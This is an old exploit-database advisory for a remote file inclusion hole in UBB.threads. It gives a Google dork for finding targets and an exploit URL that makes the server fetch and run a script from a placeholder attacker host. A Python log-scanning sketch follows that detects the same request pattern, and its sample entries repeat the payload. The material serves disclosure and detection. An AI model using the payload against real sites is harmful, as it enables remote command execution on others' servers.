UBBCentral UBB.Threads 6.4.x < 6.5.2 - 'thispath' Remote File Inclusion

EDB-ID: 1814
Author: V4mu
Type: webapps
Platform: PHP
Date: 2006-05-22



Anomaly 1n The System presents
UBB.threads >= 6.4.x Remote File Inclusion
 
found by V4mu on 04/20/2006

URL: http://www.ubbcentral.com
Google dork: allinurl:"/ubbthreads/"

exploit:
/addpost_newpoll.php?addpoll=preview&thispath=http://[attacker]/cmd.gif?&cmd=id
 
contact: irc.gigachat.net #A1TS

# milw0rm.com [2006-05-22]
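
Detection sketch for the request pattern above, added here as an example and not part of the original advisory or of UBB.threads: it scans web server access logs for requests to addpost_newpoll.php whose 'thispath' parameter carries a remote URL, including percent-encoded and double-encoded forms. The combined log format, the function names and the sample entries (addresses, host names) are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request target inside a combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Value that begins with a URL scheme plus "//", or a protocol-relative "//".
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.-]*:)?//', re.IGNORECASE)

def remote_thispath(log_line):
    """Return the remote 'thispath' value carried by the request, else None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    try:
        target = urlsplit(m.group(1))
    except ValueError:  # malformed request target
        return None
    if not target.path.lower().endswith("/addpost_newpoll.php"):
        return None
    # parse_qs percent-decodes once; unquote again to catch double encoding.
    for value in parse_qs(target.query).get("thispath", []):
        candidate = unquote(value)
        if REMOTE_RE.match(candidate):
            return candidate
    return None

def scan(lines):
    """Return (line_number, value) for every entry that should be reviewed."""
    hits = []
    for number, line in enumerate(lines, start=1):
        value = remote_thispath(line)
        if value is not None:
            hits.append((number, value))
    return hits

# Constructed sample entries; addresses and host names are placeholders.
SAMPLE_LOG = [
    '192.0.2.10 - - [22/May/2006:10:00:00 +0000] "GET /ubbthreads/addpost_newpoll.php?addpoll=preview&thispath=http://files.example/cmd.gif?&cmd=id HTTP/1.1" 200 512',
    '192.0.2.11 - - [22/May/2006:10:01:00 +0000] "GET /ubbthreads/addpost_newpoll.php?addpoll=preview&thispath=ftp%3A%2F%2Ffiles.example%2Fa.txt HTTP/1.0" 200 512',
    '198.51.100.7 - - [22/May/2006:10:02:00 +0000] "GET /ubbthreads/addpost_newpoll.php?addpoll=preview HTTP/1.1" 200 2048',
    '198.51.100.8 - - [22/May/2006:10:03:00 +0000] "GET /ubbthreads/addpost_newpoll.php?thispath=/home/forum/ubbthreads HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: thispath points at {value}")
```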